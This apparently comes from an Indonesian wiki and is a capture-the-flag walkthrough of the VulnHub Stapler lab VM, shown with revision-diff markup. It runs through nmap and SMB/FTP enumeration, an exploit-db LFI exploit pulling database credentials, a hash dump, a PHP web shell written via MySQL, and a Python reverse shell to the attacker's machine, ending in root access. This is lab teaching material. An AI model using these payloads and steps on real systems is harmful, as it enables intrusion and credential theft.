+ | | - Direct Access (Aggressive Detection), 100% confidence | ||
+ | | References: | ||
+ | | - http://codex.wordpress.org/XML-RPC_Pingback_API | ||
+ | | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | ||
+ | | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | ||
+ | | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | ||
+ | | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ | ||
+ | |||
+ | [+] WordPress readme found: https://192.168.0.61:12380/blogblog/readme.html | ||
+ | | Found By: Direct Access (Aggressive Detection) | ||
+ | | Confidence: 100% | ||
+ | |||
+ | [+] Registration is enabled: https://192.168.0.61:12380/blogblog/wp-login.php? action=register | ||
+ | | Found By: Direct Access (Aggressive Detection) | ||
+ | | Confidence: 100% | ||
+ | |||
+ | [+] Upload directory has listing enabled: https://192.168.0.61:12380/blogblog/wp-content/uploads/ | ||
+ | | Found By: Direct Access (Aggressive Detection) | ||
+ | | Confidence: 100% | ||
+ | |||
+ | [+] The external WP-Cron seems to be enabled: https://192.168.0.61:12380/blogblog/wp-cron.php | ||
+ | | Found By: Direct Access (Aggressive Detection) | ||
+ | | Confidence: 60% | ||
+ | | References: | ||
+ | | - https://www.iplocation.net/defend-wordpress-from-ddos | ||
+ | | - https://github.com/wpscanteam/wpscan/issues/1299 | ||
+ | |||
+ | [+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27). | ||
+ | | Found By: Rss Generator (Passive Detection) | ||
+ | | - https://192.168.0.61:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator> | ||
+ | | - https://192.168.0.61:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator> | ||
+ | |||
+ | [+] WordPress theme in use: bhost | ||
+ | | Location: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/ | ||
+ | | Last Updated: 2022-10-30T00:00:00.000Z | ||
+ | | Readme: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/readme.txt | ||
+ | | [!] The version is out of date, the latest version is 1.6 | ||
+ | | Style URL: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1 | ||
+ | | Style Name: BHost | ||
+ | | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ... | ||
+ | | Author: Masum Billah | ||
+ | | Author URI: http://getmasum.net/ | ||
+ | | | ||
+ | | Found By: Css Style In Homepage (Passive Detection) | ||
+ | | | ||
+ | | Version: 1.2.9 (80% confidence) | ||
+ | | Found By: Style (Passive Detection) | ||
+ | | - https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, | ||
+ | Match: 'Version: 1.2.9' | ||
+ | |||
+ | [+] Enumerating All Plugins (via Passive Methods) | ||
+ | |||
+ | [i] No plugins Found. | ||
+ | |||
+ | [!] No WPScan API Token given, as a result vulnerability data has not been output. | ||
+ | [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register | ||
+ | |||
+ | [+] Finished: Mon Jan 23 03:23:29 2023 | ||
+ | [+] Requests Done: 2 | ||
+ | [+] Cached Requests: 34 | ||
+ | [+] Data Sent: 660 B | ||
+ | [+] Data Received: 1.093 KB | ||
+ | [+] Memory used: 239.617 MB | ||
+ | [+] Elapsed time: 00:00:05 | ||
+ | |||
+ | Keren! | ||
+ | * Kita dapat banyak user | ||
+ | * Tampaknya ada XSS Vulnerability, Path Traversal Vulnerability | ||
+ | * Cek LFI exploit https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion dibagian advanced-video-embed-embed-videos-or-playlists | ||
+ | * Contoh exploit ada di https://www.exploit-db.com/exploits/39646 | ||
+ | |||
+ | ==LFI Exploit== | ||
+ | |||
+ | Download Exploit dari https://www.exploit-db.com/exploits/39646 | ||
+ | Edit file | ||
+ | |||
+ | vi /home/kali/Downloads/39646.py | ||
+ | |||
+ | Tambahkan, | ||
+ | |||
+ | import ssl | ||
+ | ssl._create_default_https_context = ssl._create_unverified_context | ||
+ | url = "https://192.168.0.61:12380/blogblog/" | ||
+ | |||
+ | Jalankan | ||
+ | |||
+ | cd /home/kali/Downloads/ | ||
+ | python2 39646.py | ||
+ | |||
+ | Setelah berhasil jalan, coba masuk ke | ||
+ | |||
+ | https://192.168.0.61:12380/blogblog/wp-content/uploads/ | ||
+ | |||
+ | Akan tampak, | ||
+ | |||
+ | Index of /blogblog/wp-content/uploads | ||
+ | [ICO] Name Last modified Size Description | ||
+ | [PARENTDIR] Parent Directory - | ||
+ | [IMG] 1402053515.jpeg 2023-01-23 16:11 3.0K | ||
+ | |||
+ | terlihat ada file 1402053515.jpeg | ||
+ | Klik kanan di file tersebut, simpan di komputer kita. | ||
+ | |||
+ | cd /home/kali/Downloads/ | ||
+ | wget --no-check-certificate https://192.168.0.61:12380/blogblog/wp-content/uploads/1402053515.jpeg | ||
+ | |||
+ | Rename jpeg :) ... | ||
+ | |||
+ | mv 1402053515.jpeg 1402053515 | ||
+ | more 1402053515 | ||
+ | |||
+ | Hasilnya, | ||
+ | |||
+ | // ** MySQL settings - You can get this info from your web host ** // | ||
+ | /** The name of the database for WordPress */ | ||
+ | define('DB_NAME', 'wordpress'); | ||
+ | |||
+ | /** MySQL database username */ | ||
+ | define('DB_USER', 'root'); | ||
+ | |||
+ | /** MySQL database password */ | ||
+ | define('DB_PASSWORD', 'plbkac'); | ||
+ | |||
+ | /** MySQL hostname */ | ||
+ | define('DB_HOST', 'localhost'); | ||
+ | |||
+ | Keren! kita dapat password MySQL .. | ||
+ | |||
+ | ==Akses MySQL== | ||
+ | |||
+ | Akses MySQL menggunakan, | ||
+ | |||
+ | mysql -u root -p -h 192.168.0.61 -pplbkac | ||
+ | |||
+ | Hasilnya, | ||
+ | |||
+ | Welcome to the MariaDB monitor. Commands end with ; or \g. | ||
+ | Your MySQL connection id is 119 | ||
+ | Server version: 5.7.12-0ubuntu1 (Ubuntu) | ||
+ | |||
+ | Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. | ||
− | + | Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. | |
− | |||
− | [ | + | MySQL [(none)]> |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | Lihat database yang ada, | |
− | |||
− | [ | + | MySQL [(none)]> show databases; |
− | + | +--------------------+ | |
− | + | | Database | | |
− | + | +--------------------+ | |
+ | | information_schema | | ||
+ | | loot | | ||
+ | | mysql | | ||
+ | | performance_schema | | ||
+ | | phpmyadmin | | ||
+ | | proof | | ||
+ | | sys | | ||
+ | | wordpress | | ||
+ | +--------------------+ | ||
+ | 8 rows in set (0.059 sec) | ||
− | + | Pakai database wordpress, | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | [ | + | MySQL [(none)]> use wordpress |
− | + | Reading table information for completion of table and column names | |
− | + | You can turn off this feature to get a quicker startup with -A | |
− | + | ||
− | [ | + | Database changed |
+ | MySQL [wordpress]> | ||
− | + | Cek tables, | |
− | |||
− | |||
− | |||
− | |||
− | [ | + | MySQL [wordpress]> show tables; |
− | + | +-----------------------+ | |
− | + | | Tables_in_wordpress | | |
− | + | +-----------------------+ | |
− | + | | wp_commentmeta | | |
+ | | wp_comments | | ||
+ | | wp_links | | ||
+ | | wp_options | | ||
+ | | wp_postmeta | | ||
+ | | wp_posts | | ||
+ | | wp_term_relationships | | ||
+ | | wp_term_taxonomy | | ||
+ | | wp_terms | | ||
+ | | wp_usermeta | | ||
+ | | wp_users | | ||
+ | +-----------------------+ | ||
+ | 11 rows in set (0.001 sec) | ||
− | + | Cek struktur data wp_users, | |
− | |||
− | |||
− | |||
− | |||
− | [ | + | MySQL [wordpress]> describe wp_users; |
− | + | +---------------------+---------------------+------+-----+---------------------+----------------+ | |
− | + | | Field | Type | Null | Key | Default | Extra | |
− | + | | | |
− | + | +---------------------+---------------------+------+-----+---------------------+----------------+ | |
− | + | | ID | bigint(20) unsigned | NO | PRI | NULL | auto_increment | | |
+ | | user_login | varchar(60) | NO | MUL | | | ||
+ | | | ||
+ | | user_pass | varchar(64) | NO | | | | ||
+ | | | ||
+ | | user_nicename | varchar(50) | NO | MUL | | | ||
+ | | | ||
+ | | user_email | varchar(100) | NO | | | | ||
+ | | | ||
+ | | user_url | varchar(100) | NO | | | | ||
+ | | | ||
+ | | user_registered | datetime | NO | | 0000-00-00 00:00:00 | | ||
+ | | | ||
+ | | user_activation_key | varchar(60) | NO | | | | ||
+ | | | ||
+ | | user_status | int(11) | NO | | 0 | | ||
+ | | | ||
+ | | display_name | varchar(250) | NO | | | | ||
+ | | | ||
+ | +---------------------+---------------------+------+-----+---------------------+----------------+ | ||
+ | 10 rows in set (0.002 sec) | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | Print username & password (di hash) | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | [ | + | MySQL [wordpress]> SELECT user_login, user_pass FROM wp_users; |
− | + | +------------+------------------------------------+ | |
− | + | | user_login | user_pass | | |
− | + | +------------+------------------------------------+ | |
− | + | | John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | | |
− | + | | Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | | |
− | + | | Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | | |
+ | | barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | | ||
+ | | heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | | ||
+ | | garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | | ||
+ | | harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | | ||
+ | | scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | | ||
+ | | kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | | ||
+ | | tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | | ||
+ | | ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | | ||
+ | | Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | | ||
+ | | Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | | ||
+ | | Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | | ||
+ | | Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | | ||
+ | | Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | | ||
+ | +------------+------------------------------------+ | ||
+ | 16 rows in set (0.001 sec) | ||
− | + | Keren! kita bisa meng-crack password dengan md5 menggunakan hashcat atau menggunakan crack md5 online lewat web. | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | ==MySQL generate shell.php== | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | Dari shell MySQL ketik, | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | [ | + | select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php"; |
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | Akses | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | https://192.168.0.61:12380/blogblog/wp-content/uploads/ | |
− | |||
− | |||
− | |||
− | |||
− | + | Akan tampak | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | [ | + | Index of /blogblog/wp-content/uploads |
− | + | [ICO] Name Last modified Size Description | |
− | + | [PARENTDIR] Parent Directory - | |
− | + | [IMG] 1402053515.jpeg 2023-01-23 16:11 3.0K | |
− | + | [ ] shell.php 2023-01-23 16:34 39 | |
− | + | Apache/2.4.18 (Ubuntu) Server at 192.168.0.61 Port 12380 | |
− | |||
− | |||
− | + | Terlihat ada shell.php. | |
− | + | Sekarang akses URL berikut untuk mencek apakah shell.php bisa dipakai:) .. | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | https://192.168.0.61:12380/blogblog/wp-content/uploads/shell.php?cmd=ifconfig | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | Hasilnya kira-kira | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | enp0s3 Link encap:Ethernet HWaddr 08:00:27:8b:94:43 inet addr:192.168.0.61 | |
− | + | Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX | |
− | + | packets:299263 errors:91 dropped:0 overruns:0 frame:0 TX packets:97438 errors:0 dropped:0 | |
− | + | overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:27580727 (27.5 MB) TX | |
− | + | bytes:69269091 (69.2 MB) Interrupt:19 Base address:0xd000 lo Link encap:Local Loopback inet | |
− | + | addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:468 | |
− | + | errors:0 dropped:0 overruns:0 frame:0 TX packets:468 errors:0 dropped:0 overruns:0 | |
− | + | carrier:0 collisions:0 txqueuelen:1 RX bytes:50152 (50.1 KB) TX bytes:50152 (50.1 KB) | |
− | + | Inti-nya shell.php bisa di pakai :) .. | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | ==Akses Shell via Web== | |
− | + | ||
− | + | Cek IP address & catat kali linux | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | ifconfig | |
− | + | ||
− | + | Misalnya IP address kali linux 192.168.0.62 | |
− | + | Siapkan di kali linux, | |
− | + | ||
− | + | nc -lvp 443 | |
− | + | ||
− | + | Lewat browser jalankan URL (asumsi IP address kali linux | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
+ | https://192.168.0.61:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.62",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' | ||
− | + | Jika berjalan dengan baik akan tampak | |
− | |||
− | [ | + | 192.168.0.61: inverse host lookup failed: Unknown host |
+ | connect to [192.168.0.62] from (UNKNOWN) [192.168.0.61] 50340 | ||
+ | /bin/sh: 0: can't access tty; job control turned off | ||
+ | $ | ||
− | + | Gunakan python untuk mengaktifkan bash | |
− | + | $ python -c 'import pty;pty.spawn("/bin/bash")' | |
+ | www-data@red:/var/www/https/blogblog/wp-content/uploads$ cd / | ||
+ | cd / | ||
+ | www-data@red:/$ ls | ||
+ | ls | ||
+ | bin etc lib mnt root snap tmp vmlinuz.old | ||
+ | boot home lost+found opt run srv usr | ||
+ | dev initrd.img.old media proc sbin sys var | ||
+ | www-data@red:/$ cd home | ||
+ | cd home | ||
+ | www-data@red:/home$ | ||
− | + | Lihat bash_history menggunakan | |
− | |||
− | |||
− | |||
− | |||
− | + | www-data@red:/home$ find -name ".bash_history" -exec cat {} \; | |
− | + | find -name ".bash_history" -exec cat {} \; | |
− | + | exit | |
+ | exit | ||
+ | free | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | top | ||
+ | ps aux | ||
+ | exit | ||
+ | exit | ||
+ | id | ||
+ | cat: ./peter/.bash_history: Permission denied | ||
+ | find: './peter/.cache': Permission denied | ||
+ | exit | ||
+ | id | ||
+ | whoami | ||
+ | ls -lah | ||
+ | pwd | ||
+ | ps aux | ||
+ | sshpass -p thisimypassword ssh JKanode@localhost | ||
+ | apt-get install sshpass | ||
+ | sshpass -p JZQuyIN5 peter@localhost | ||
+ | ps -ef | ||
+ | top | ||
+ | kill -9 3747 | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | whoami | ||
+ | exit | ||
+ | exit | ||
+ | exit | ||
+ | top | ||
+ | exit | ||
− | + | Terlihat ada dua (2) username & password | |
− | + | JKanode thisismypassword | |
− | + | peter JZQuyIN5 | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | ==SSH ke Server== | |
− | |||
− | |||
− | |||
− | |||
+ | ssh ke server | ||
− | + | ssh peter@192.168.0.61 | |
− | |||
− | |||
− | |||
− | |||
− | + | ----------------------------------------------------------------- | |
+ | ~ Barry, don't forget to put a message here ~ | ||
+ | ----------------------------------------------------------------- | ||
+ | red% | ||
+ | |||
+ | Menjadi su | ||
+ | |||
+ | red% sudo -l | ||
+ | |||
+ | We trust you have received the usual lecture from the local System | ||
+ | Administrator. It usually boils down to these three things: | ||
+ | |||
+ | #1) Respect the privacy of others. | ||
+ | #2) Think before you type. | ||
+ | #3) With great power comes great responsibility. | ||
+ | |||
+ | [sudo] password for peter: | ||
+ | Matching Defaults entries for peter on red: | ||
+ | lecture=always, env_reset, mail_badpass, | ||
+ | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin | ||
+ | |||
+ | User peter may run the following commands on red: | ||
+ | (ALL : ALL) ALL | ||
+ | red% | ||
− | + | ==Capture the Flag== | |
− | + | red% sudo usermod -s /bin/bash peter | |
− | + | red% sudo -i | |
− | + | ➜ ~ cd /root | |
+ | ➜ ~ ls | ||
+ | fix-wordpress.sh flag.txt issue python.sh wordpress.sql | ||
+ | ➜ ~ cat flag.txt | ||
+ | 16:58, 23 January 2023 (WIB)16:58, 23 January 2023 (WIB)<(Congratulations)>16:58, 23 January 2023 (WIB)16:58, 23 January 2023 (WIB) | ||
+ | .-'''''-. | ||
+ | |'-----'| | ||
+ | |-.....-| | ||
+ | | | | ||
+ | | | | ||
+ | _,._ | | | ||
+ | __.o` o`"-. | | | ||
+ | .-O o `"-.o O )_,._ | | | ||
+ | ( o O o )--.-"`O o"-.`'-----'` | ||
+ | '--------' ( o O o) | ||
+ | `----------` | ||
+ | b6b545dc11b7a270f4bad23432190c75162c4a2b | ||
==Referensi== | ==Referensi== | ||
* https://jhalon.github.io/vulnhub-stapler1/ | * https://jhalon.github.io/vulnhub-stapler1/ |
Latest revision as of 10:24, 10 February 2023
Description
+---------------------------------------------------------+ | | | __..--\ | | __..-- \ | | __..-- __..-- | | __..-- __..-- | | | \ o __..--____....----"" | | \__..--\ | | | \ | | +----------------------------------+ | | +----------------------------------+ | | | +- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+ | Name: Stapler | IP: DHCP | | Date: 2016-June-08 | Goal: Get Root! | | Author: g0tmi1k | Difficultly: ??? ;) | +- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+ | | | + Average beginner/intermediate VM, only a few twists | | + May find it easy/hard (depends on YOUR background) | | + ...also which way you attack the box | | | | + It SHOULD work on both VMware and Virtualbox | | + REBOOT the VM if you CHANGE network modes | | + Fusion users, you'll need to retry when importing | | | | + There are multiple methods to-do this machine | | + At least two (2) paths to get a limited shell | | + At least three (3) ways to get a root access | | | | + Made for BsidesLondon 2016 | | + Slides: https://download.vulnhub.com/media/stapler/ | | | | + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman | | + ...and shout-outs to the VulnHub-CTF Team =) | | | +- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+ | | | --~~Enjoy. Have fun. Happy Hacking.~~-- | | | +---------------------------------------------------------+
Instalasi
- Download OVA
- Install di VirtualBox
- Jalankan
Hack
netdiscover
Cek IP address server Stapler
netdiscover -r 192.168.0.0/24
hasilnya
Currently scanning: Finished! | Screen View: Unique Hosts 29 Captured ARP Req/Rep packets, from 21 hosts. Total size: 1740 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.0.2 40:16:7e:22:e7:69 1 60 ASUSTek COMPUTER INC. 192.168.0.4 10:6f:3f:3d:73:d0 1 60 BUFFALO.INC 192.168.0.7 4c:e6:76:1f:15:4b 1 60 BUFFALO.INC 192.168.0.9 10:6f:3f:17:94:94 1 60 BUFFALO.INC 192.168.0.7 4c:e6:76:1f:15:4c 1 60 BUFFALO.INC 192.168.0.61 08:00:27:8b:94:43 1 60 PCS Systemtechnik GmbH 192.168.0.60 74:d0:2b:6a:a9:66 1 60 ASUSTek COMPUTER INC. 192.168.0.101 08:60:6e:db:4e:b8 1 60 ASUSTek COMPUTER INC. 192.168.0.141 b0:a7:b9:b6:c1:c9 3 180 TP-Link Corporation Limited 192.168.0.102 6c:29:90:1e:89:7f 1 60 WiZ Connected Lighting Company Limited 192.168.0.145 c0:56:27:1c:be:e1 1 60 Belkin International Inc. 192.168.0.169 4c:e6:76:1f:15:4b 1 60 BUFFALO.INC 192.168.0.170 4c:e6:76:1f:15:4b 1 60 BUFFALO.INC 192.168.0.169 4c:e6:76:1f:15:4c 1 60 BUFFALO.INC 192.168.0.170 4c:e6:76:1f:15:4c 1 60 BUFFALO.INC 192.168.0.199 b4:b0:24:3d:8b:3b 1 60 TP-Link Corporation Limited 192.168.0.223 c0:56:27:67:0d:a3 1 60 Belkin International Inc. 192.168.0.224 28:ff:3e:5c:10:32 4 240 zte corporation 192.168.0.222 6c:16:32:63:52:21 4 240 HUAWEI TECHNOLOGIES CO.,LTD 192.168.0.144 6e:65:e5:8a:25:0d 1 60 Unknown vendor 0.0.0.0 b0:a7:b9:b6:c1:c9 1 60 TP-Link Corporation Limited
Target di VirtualBox biasanya MAC 08:00:.....
IP address target disini adalah
192.168.0.61 08:00:27:8b:94:43 1 60 PCS Systemtechnik GmbH
Port Scanning
Port scanning
nmap -sS -A -O -n -p1-60000 192.168.0.61 nmap -v -A 192.168.0.61
Hasilnya kira-kira,
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 01:11 EST Initiating SYN Stealth Scan at 01:11 Scanning 192.168.0.61 [1000 ports] Discovered open port 21/tcp on 192.168.0.61 Discovered open port 139/tcp on 192.168.0.61 Discovered open port 3306/tcp on 192.168.0.61 Discovered open port 80/tcp on 192.168.0.61 Discovered open port 53/tcp on 192.168.0.61 Discovered open port 22/tcp on 192.168.0.61 Discovered open port 666/tcp on 192.168.0.61 Scanning 7 services on 192.168.0.61 Nmap scan report for 192.168.0.61 Host is up (0.00066s latency). Not shown: 992 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.0.62 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 550 Permission denied. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) | 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) |_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519) 53/tcp open domain dnsmasq 2.75 | dns-nsid: | NSID: 218m83 (3231386d3833) | id.server: CGK |_ bind.version: dnsmasq-2.75 80/tcp open http PHP cli server 5.5 or later |_http-title: 404 Not Found | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS 139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) 666/tcp open doom? | fingerprint-strings: | NULL: | message2.jpgUT | QWux | "DL[E | #;3[ | \xf6 | u([r | qYQq | Y_?n2 | 3&M~{ | 9-a)T | L}AJ |_ .npy.9 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 | mysql-info: | Protocol: 10 | Version: 5.7.12-0ubuntu1 | Thread ID: 10 | Capabilities flags: 63487 | Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, FoundRows, SupportsLoadDataLocal, InteractiveClient, SupportsTransactions, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, LongPassword, ODBCClient, ConnectWithDatabase, SupportsCompression, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments | Status: Autocommit | Salt: <Xp\x1EH]w*\x1C"+\x14\x19\x16*\x15ZnR\x1D |_ Auth Plugin Name: mysql_native_password MAC Address: 08:00:27:8B:94:43 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess: 0.005 days (since Mon Jan 23 01:04:14 2023) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s | smb2-time: | date: 2023-01-23T13:11:23 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | RED<00> Flags: <unique><active> | RED<03> Flags: <unique><active> | RED<20> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> |_ WORKGROUP<1e> Flags: <group><active> | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | Computer name: red | NetBIOS computer name: RED\x00 | Domain name: \x00 | FQDN: red |_ System time: 2023-01-23T13:11:23+00:00 TRACEROUTE HOP RTT ADDRESS 1 0.66 ms 192.168.0.61 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 49.02 seconds Raw packets sent: 2024 (90.564KB) | Rcvd: 24 (1.428KB)
Salah satu yang menarik disini adalah FTP, dengan anonymous FTP login.
Anonymous FTP
Coba login anonymous ftp (username anonymous password bebas merdeka)
ftp 192.168.0.61 Connected to 192.168.0.61. 220- 220-|----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|----------------------------------------------------------------------------------------| 220- 220 Name (192.168.0.61:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>
Keren! cek ada file apa saja di FTP server tersebut dan ambil file yang ada :) ..
ftp> ls 550 Permission denied. 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp> get note local: note remote: note 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 100% |*************************************************************************************************************************************************************************************| 107 0.91 KiB/s 00:00 ETA 226 Transfer complete. 107 bytes received in 00:00 (0.91 KiB/s) ftp> quit 221 Goodbye.
Buka note
cat note
Isinya,
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Tidak ada yang terlalu menarik,tapi ada dua (2) nama :) ... mungkin bisa membantu nanti jika kita butuh bruteforce.
Coba SSH root
Coba akses.
ssh root@192.168.0.61
Hasilnya gagal,
The authenticity of host '192.168.0.61 (192.168.0.61)' can't be established. ED25519 key fingerprint is SHA256:eKqLSFHjJECXJ3AvqDaqSI9kP+EbRmhDaNZGyOrlZ2A. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.0.61' (ED25519) to the list of known hosts. ----------------------------------------------------------------- ~ Barry, don't forget to put a message here ~ ----------------------------------------------------------------- root@192.168.0.61's password: Permission denied, please try again.
Tapi kita dapat satu nama lagi :) ..
Coba SMB
Coba,
smbclient -L 192.168.0.61 Password for [WORKGROUP\root]:
Coba isi password dengan root. Untung2-an berhasil :) .. Hasilnya kira-kira
Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers kathy Disk Fred, What are we doing here? tmp Disk All temporary files should be stored here IPC$ IPC IPC Service (red server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP SCANDISK
Tampaknya ada 2 active share - kathy dan tmp.
Yang menarik ada komentar - Fred, What are we doing here?
Tampaknya Fred bisa mengakses kathy share.
Mari kita akses kathy share menggunakan networked user/computer fred.
smbclient //fred/kathy -I 192.168.0.61 -N
Coba check ls
Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Jun 3 12:52:52 2016 .. D 0 Mon Jun 6 17:39:56 2016 kathy_stuff D 0 Sun Jun 5 11:02:27 2016 backup D 0 Sun Jun 5 11:04:14 2016 19478204 blocks of size 1024. 16397108 blocks available smb: \>
Keren! tampaknya kita bisa tersambung. Lakukan enumerate file dan folder.
